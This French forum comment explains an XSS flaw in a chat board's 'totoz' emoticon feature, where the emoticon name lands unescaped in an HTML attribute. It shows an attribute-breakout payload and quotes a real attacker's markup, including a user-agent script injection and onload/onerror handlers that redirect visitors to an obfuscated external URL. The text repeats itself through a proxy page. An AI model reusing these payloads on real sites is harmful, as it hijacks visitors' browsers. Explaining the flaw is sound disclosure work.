Retourner au contenu associé (entrée du suivi : faille xss et un gosse qui joue avec)
Posté par needs le 21 août 2012 à 21:25. En réponse à l’entrée du suivi faille xss et un gosse qui joue avec. Évalué à 2 (+0/-0).
Voici une tentative d'explication : Lorsque que l'on insert un totoz, par exemple onoz, voici ce que l'on obtient :
onoz
<span data-totoz-name="onoz" class="totoz">[:onoz]</span>
Vous l'aurez vite compris, la faille provient du fait que le nom du totoz est inséré dans l'attribut data-totoz-name. Du coup avec un totoz un peu plus élaboré comme " onload="alert('owned')" title=" on obtient le code suivant :
data-totoz-name
" onload="alert('owned')" title="
<span data-totoz-name="" onload="alert('owned')" title="" class="totoz">[:" onload="alert('owned')" title="]</span>
Pour les curieux, voici le code source de son commentaire :
<p id="board-823943" class="chat"> <span title="Mozilla/5.0 (X11; Linux x86_64; rv:14.0) Gecko/20100101 Firefox/14.0.1 &#x27;&quot;&gt;&lt;/script&gt;&lt;script&gt;alert(&#x27;test&#x27;)&lt;/script&gt;" class="board-left"> <time datetime="2012-08-21T19:12:56+02:00" class="norloge">19:12:56</time> <b><a href="/users/superxss">superxss</a></b> </span> <span class="board-right"><span title="" onload="location.href='h'+'ttp://5a'+'mp.free.f'+'r/fork.html'" onerror="location.href='h'+'ttp://5a'+'mp.free.f'+'r/fork.html'" data-totoz-name="" class="totoz">[:" onerror="location.href='h'+'ttp://5a'+'mp.free.f'+'r/fork.html'" onload="location.href='h'+'ttp://5a'+'mp.free.f'+'r/fork.html'" title="]</span></span> </p>
On peut remarquer qu'il a tenté avec le user-agent, mais que manifestement, sa n'a pas marché. Du coup il c'est rabattu sur les totoz.
user-agent
AltStyle によって変換されたページ (->オリジナル) / アドレス: モード: デフォルト 音声ブラウザ ルビ付き 配色反転 文字拡大 モバイル
# Totoz
Posté par needs . En réponse à l’entrée du suivi faille xss et un gosse qui joue avec. Évalué à 2 (+0/-0).
Voici une tentative d'explication :
Lorsque que l'on insert un totoz, par exemple
onoz, voici ce que l'on obtient :Vous l'aurez vite compris, la faille provient du fait que le nom du totoz est inséré dans l'attribut
data-totoz-name. Du coup avec un totoz un peu plus élaboré comme" onload="alert('owned')" title="on obtient le code suivant :Pour les curieux, voici le code source de son commentaire :
On peut remarquer qu'il a tenté avec le
user-agent, mais que manifestement, sa n'a pas marché. Du coup il c'est rabattu sur les totoz.